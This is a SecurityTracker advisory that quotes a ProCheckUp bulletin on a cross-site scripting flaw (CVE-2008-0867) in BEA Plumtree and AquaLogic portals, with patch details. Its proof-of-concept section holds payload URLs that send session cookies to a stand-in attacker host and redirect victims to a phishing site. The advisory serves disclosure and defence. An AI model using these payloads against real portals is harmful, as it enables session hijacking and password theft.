SecurityTracker.com
Category:   Application (Web Server/CGI)  >   Plumtree Vendors:   BEA Systems
Plumtree Portal Input Validation Errors Permit Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1019440
SecurityTracker URL:  http://securitytracker.com/id/1019440
CVE Reference:   CVE-2008-0867
Updated:  Mar 14 2008
Original Entry Date:  Feb 19 2008
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 6.0
Description:   A vulnerability was reported in Plumtree Portal and AquaLogic Interaction. A remote user can conduct cross-site scripting attacks.

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Plumtree software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit URLs are provided:

https://[target]/portal/server.pt?open=space&name=</SCRIPT><script>alert('CanCrossSiteScript')</script>
https://[target]/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert('CanCrossSiteScript')%3C/script%3E%3C!--

The vendor was notified on May 18, 2007.

BEA AquaLogic Interaction is also affected.

Jan Fry and Adrian Pastor of ProCheckUp Ltd reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Plumtree software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued a patch (Plumtree Foundation 6.0.1.316111, AquaLogic Interaction 6.1.1.316115).

The BEA advisory is available at:

http://dev2dev.bea.com/pub/advisory/259

Vendor URL:  dev2dev.bea.com/pub/advisory/259
Cause:   Input validation error
Underlying OS:  Linux (Red Hat Enterprise), Linux (SuSE), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (2003)

Message History:   None.


Source Message Contents

Subject:  PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction

PR06-12: XSS on BEA Plumtree Foundation and AquaLogic Interaction portals


Description:

BEA Plumtree Foundation portal 6.0 and BEA AquaLogic Interaction 6.1 are 
affected by a cross-site scripting (XSS) vulnerability in the 'name' 
parameter submitted to the '/portal/server.pt' server-side script.

Date found: 12th September 2006

Vendor contacted: 18th May 2007

Successfully tested on: BEA Plumtree Foundation 6.0.1.218452.

BEA Systems have confirmed the following versions to be affected:

BEA Plumtree Foundation 6.0 through service pack 1.
BEA AquaLogic Interaction 6.1 through service pack 1.

BEA Plumtree 5.0J.173033, 5.02, 5.03 and 5.4 are not affected by this issue.


Severity: Medium-High


Authors: Jan Fry and Adrian Pastor of ProCheckUp Ltd (www.procheckup.com)

ProCheckUp thanks BEA Systems for their co-operation.

Proof of concept:

The following requests launch a JavaScript alert box in the user's web 
browser, simply to prove that it is possible to run scripting code in the 
victim's web browser.

Please note that '%22;}%3C/script%3E' is prepended to the second variant 
of each payload: it closes the quoted string, the statement and brace 
block, and the script element into which the 'name' value is reflected, 
so that the overall HTML document stays syntactically correct. The 
trailing '%3C!--' opens an HTML comment that hides the leftover fragment 
of the original script. This increases the chance of the attack working 
on different web browser types:

https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>alert('CanCrossSiteScript')</script>
https://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert('CanCrossSiteScript')%3C/script%3E%3C!--


The following requests allow session hijacking through cookie theft:

https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie</script>
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://attackers-site.foo/grabber.php?c="%2bdocument.cookie%3C/script%3E%3C!--

The following requests allow password theft by redirecting to a 
third-party 'spoof' site which would perform a phishing attack on the 
victim:

https://target-domain.foo/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://phishers-site.foo"</script>
http://target-domain.foo/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://phishers-site.foo"%3C/script%3E%3C!--

HTML injection through this XSS vulnerability is also possible. This 
allows advanced phishing attacks by inserting a HTML form within the 
context of the victim website.


Consequences:

Scripting code can be run within the security context of the target 
site. User accounts can be hijacked. Advanced phishing attacks can be 
launched.


Note:

This vulnerability could be considered a medium-high risk (rather than 
medium risk) in cases in which admin users are targeted, resulting in 
the attacker gaining administrative privileges on the target 
Plumtree/AquaLogic Portal.


Fix: this issue will be addressed in the 6.5 release of AquaLogic 
Interaction.


References:

"ProCheckUp - Security Vulnerabilities"
http://www.procheckup.com/Vulnerabilities.php

BEA's BEA08-186.00 advisory:

"Security Advisories and Notifications"
http://dev2dev.bea.com/advisoriesnotifications/


Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the 
Internet community for the purpose of alerting them to problems, if and 
only if, the Bulletin is not edited or changed in any way, is attributed 
to Procheckup, and provided such reproduction and/or distribution is 
performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not 
liable for any misuse of this information by any third party.

Copyright 2019, SecurityGlobal.net LLC